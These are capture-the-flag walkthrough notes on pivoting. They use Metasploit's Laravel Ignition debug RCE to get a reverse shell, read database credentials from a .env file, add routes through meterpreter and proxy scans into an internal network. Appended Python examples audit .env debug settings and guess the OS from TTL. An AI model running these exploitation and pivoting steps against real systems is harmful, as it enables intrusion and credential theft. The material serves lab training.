# Pivoting

###### tags: `tryhackme` `metasploit` `pivoting`

[TOC]

---

https://www.youtube.com/watch?v=mZqNP2fOLlk&t=2672s

## Nmap

```
nmap 10.10.32.27 -sC -sV -F
```

- -sC: run the default NSE scripts
- -sV: detect service versions
- -F: fast mode (scans fewer ports than the default scan)

![](https://i.imgur.com/vb9LMOD.png)

INFO
- apache 2.5.54

---

## Ping host

```
ping 10.10.32.27
```

![](https://i.imgur.com/HDLoK4n.png)

INFO
- ttl=64 -> Linux host
- ttl=128 -> Windows host

---

## Open browser

```
firefox 10.10.32.27
```

![](https://i.imgur.com/6MxulkF.png)

INFO
- Laravel v8.26.1 (PHP v7.4.30)

---

## Find Exploit (Local Database)

```
searchsploit laravel
```

![](https://i.imgur.com/2xbgIep.png)

---

```
searchsploit laravel 8
```

![](https://i.imgur.com/S7l9MHX.png)

- Laravel 8.4.2 debug mode - Remote code execution | php/webapps/49424.py //RCE

---

Metasploit (modular exploit framework)
- auxiliary (scanning modules)

```
msf6 > search laravel
```

![](https://i.imgur.com/fQicXO6.png)

```
info exploit/multi/php/ignition_laravel_debug_rce
```

or

```
info 1
```

---

Using the module

```
use 1
```

or

```
use exploit/multi/php/ignition_laravel_debug_rce
```

![](https://i.imgur.com/Nx58zLf.png)

```
msf6 exploit(multi/php/ignition_laravel_debug_rce) > set RHOSTS 10.10.32.27
```

---

Automatically check whether the target is vulnerable

```
msf6 exploit(multi/php/ignition_laravel_debug_rce) > check
```

![](https://i.imgur.com/K1Ak2wy.png)

---

```
msf6 exploit(multi/php/ignition_laravel_debug_rce) > show targets
```

![](https://i.imgur.com/CE85uWa.png)

---

```
show options
```

![](https://i.imgur.com/0d03Hc6.png)

---

```
msf6 exploit(multi/php/ignition_laravel_debug_rce) > set LHOST eth0
```

- eth0 (local network interface)

Super hacker Www

```
exploit
```

![](https://i.imgur.com/DY5YM4K.png)

---

```
id
```

![](https://i.imgur.com/vFoFflq.png)

![](https://i.imgur.com/dCpZyZd.png)

- user: www-data

We're in !!!!!!! (awesome, fantastic)

---

## Upgrade Our Reverse Shell

```
background
```

Lets the current reverse shell keep running in the background

---

Show our current sessions

```
sessions
```

---

Upgrade to a super shell (meterpreter)

```
sessions -u 1
```

![](https://i.imgur.com/cSPQE3z.png)

![](https://i.imgur.com/UNliCWQ.png)

---

## Interact with our super shell

```
sessions -i 2
```

![](https://i.imgur.com/Dvpo8Te.png)

```
help
```

![](https://i.imgur.com/cyDYX8K.png)

![](https://i.imgur.com/xYH0Rlz.png)

![](https://i.imgur.com/FX518nL.png)

Recommended by cyber security experts: take some time to get familiar with meterpreter (it's very powerful and fun)

```
getuid //whoami
```

![](https://i.imgur.com/Ke6HSmh.png)

```
getpid //current process
```

![](https://i.imgur.com/SC4bkWL.png)

```
ps //aux
```

![](https://i.imgur.com/pgpc0Vk.png)

---

Inside the docker container we need to find the DB credentials to access the DB

```
shell
```

```
env
```

```
cd /var/www
```

![](https://i.imgur.com/nt4EOR1.png)

```
cat .env
```

![](https://i.imgur.com/UxyNM9B.png)

DNS resolve

```
resolve webservice_database
```

![](https://i.imgur.com/gxGu38P.png)

Save session 2

```
background
```

## Router

Adding routes through session 2 (meterpreter)

```
route add 172.28.101.51/32 2
```

```
route add 172.17.0.1/32 2
```

![](https://i.imgur.com/BChOBiS.png)

---

Try to access the DB

```
search postgre
```

- id 16 'schema' -> dumps DB information

![](https://i.imgur.com/IUETk53.png)

Result

![](https://i.imgur.com/ZyzALwD.png)

Try to execute an SQL query

![](https://i.imgur.com/vxKmQ83.png)

```
use 11
```

```
info
```

```
set RHOST 172.28.101.51
```

```
set DATABASE postgres
```

```
set SQL "select * from users"
```

```
exploit
```

![](https://i.imgur.com/FzZizxA.png)

---

## Socks proxy

```
search socks
```

![](https://i.imgur.com/4Zw9LHM.png)

```
use 0
```

```
exploit
```

```
jobs //jobs -l (kill the process)
```

Local host

```
curl --proxy socks5://127.0.0.1:1080 http://172.17.0.1
```

![](https://i.imgur.com/kY9uv7A.png)

```
proxychains -h
```

```
vim /etc/proxychains4.conf
```

```
socks5 127.0.0.1 1080
```

```
proxychains curl http://172.17.0.1
```

---

Scanning

```
proxychains nmap -sV -sT -F -Pn 172.17.0.1
```

![](https://i.imgur.com/VCLggwf.png)
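The "Ping host" section reads the OS family off the TTL in the ping reply (64 -> Linux, 128 -> Windows). The heuristic generalises: each router on the path decrements the TTL by one, so the observed value is the sender's default minus the hop count. The following is an added example, not part of the original note, that parses a ping reply line and picks the nearest common default TTL; the ping line and the default table are assumptions (the note only uses 64 and 128).

```python
"""Guess the sending OS family from an observed TTL.

Added example, not from the original note. The heuristic: the OS sets an
initial TTL (64, 128 or 255 are the common defaults) and every router hop
subtracts 1, so observed = default - hops. We pick the smallest default that
is >= the observed value and report the implied hop count.
"""
import re
from typing import Optional, Tuple

# Common initial TTL values by OS family (assumed table; the note only
# states 64 -> Linux and 128 -> Windows).
INITIAL_TTLS = (
    (64, "Linux/Unix"),
    (128, "Windows"),
    (255, "network device / some BSD"),
)

# Matches "ttl=64" (Linux ping) and "TTL=128" (Windows ping).
_TTL_RE = re.compile(r"\bttl=(\d+)", re.IGNORECASE)


def ttl_from_ping_line(line: str) -> Optional[int]:
    """Extract the TTL field from one ping reply line, or None if absent."""
    m = _TTL_RE.search(line)
    return int(m.group(1)) if m else None


def guess_os_from_ttl(ttl: int) -> Tuple[str, int]:
    """Return (os family, estimated hops) for an observed TTL.

    Caveat: the guess is ambiguous once many hops are involved (a TTL of 50
    could be Linux 14 hops away or Windows 78 hops away); the nearest default
    is chosen because paths that long are rare.
    """
    if not 1 <= ttl <= 255:
        raise ValueError("TTL must be in 1..255")
    for default, family in INITIAL_TTLS:
        if ttl <= default:
            return family, default - ttl
    raise AssertionError("unreachable: 255 is the largest default")


def classify_ping_line(line: str) -> Optional[Tuple[str, int]]:
    """Convenience wrapper: parse a ping reply line and classify it."""
    ttl = ttl_from_ping_line(line)
    return None if ttl is None else guess_os_from_ttl(ttl)


if __name__ == "__main__":
    # Constructed sample reply lines, not captured from the lab.
    for sample in (
        "64 bytes from 10.10.32.27: icmp_seq=1 ttl=64 time=0.53 ms",
        "Reply from 10.10.32.28: bytes=32 time=12ms TTL=125",
    ):
        print(sample, "->", classify_ping_line(sample))
```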
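Two things in the walkthrough come from one file: the Ignition RCE only works because Laravel's debug mode is on, and the database credentials used for the pivot were read with `cat .env` as `www-data`. From the defender's side the check is the same file. The following is an added example, not from the original note or the Laravel project, that parses a `.env` in dotenv format and flags the debug setting and the presence of plaintext database credentials; the sample file contents are constructed.

```python
"""Audit a Laravel .env for the two exposures used in the walkthrough.

Added example, not from the original note. It parses KEY=VALUE lines (the
dotenv format Laravel reads) and reports:
  - APP_DEBUG enabled (Ignition debug pages; RCE on vulnerable versions)
  - APP_DEBUG enabled while APP_ENV=production
  - database credentials present in plaintext (readable by the web user)
"""
import re
from typing import Dict, List, Tuple

# Constructed sample; not the lab's real file.
SAMPLE_ENV = """\
APP_NAME=Laravel
APP_ENV=production
APP_DEBUG=true
APP_URL=http://localhost   # inline comment on an unquoted value

DB_CONNECTION=pgsql
DB_HOST=webservice_database
DB_PORT=5432
DB_DATABASE=postgres
DB_USERNAME=postgres
DB_PASSWORD='hunter2'
"""

_LINE_RE = re.compile(r"^(?:export\s+)?([A-Za-z_][A-Za-z0-9_]*)\s*=\s*(.*)$")
_TRUTHY = {"true", "1", "on", "yes"}


def parse_dotenv(text: str) -> Dict[str, str]:
    """Parse dotenv text: skip blanks/comments, strip matching quotes,
    drop an inline comment that follows an unquoted value."""
    env: Dict[str, str] = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        m = _LINE_RE.match(line)
        if not m:
            continue
        key, value = m.group(1), m.group(2).strip()
        if len(value) >= 2 and value[0] == value[-1] and value[0] in "\"'":
            value = value[1:-1]
        else:
            value = value.split(" #", 1)[0].rstrip()
        env[key] = value
    return env


def audit_laravel_env(env: Dict[str, str]) -> List[Tuple[str, str, str]]:
    """Return (severity, code, message) findings for a parsed .env."""
    findings: List[Tuple[str, str, str]] = []
    debug_on = env.get("APP_DEBUG", "false").strip().lower() in _TRUTHY
    if debug_on:
        findings.append(("high", "APP_DEBUG_ENABLED",
                         "debug mode exposes Ignition error pages; set APP_DEBUG=false"))
        if env.get("APP_ENV", "").strip().lower() == "production":
            findings.append(("high", "DEBUG_IN_PRODUCTION",
                             "APP_DEBUG=true with APP_ENV=production"))
    if env.get("DB_PASSWORD"):
        findings.append(("info", "DB_CREDENTIALS_IN_ENV",
                         "DB_USERNAME/DB_PASSWORD are plaintext in .env; restrict file "
                         "permissions so the web server user cannot read more than needed"))
    return findings


def finding_codes(text: str) -> List[str]:
    """Parse and audit in one step; returns just the finding codes."""
    return [code for _, code, _ in audit_laravel_env(parse_dotenv(text))]


if __name__ == "__main__":
    for sev, code, msg in audit_laravel_env(parse_dotenv(SAMPLE_ENV)):
        print(f"[{sev}] {code}: {msg}")
```

With `APP_DEBUG=false` the two high findings disappear and only the informational note about credentials remains, which is the expected state for a deployed Laravel application.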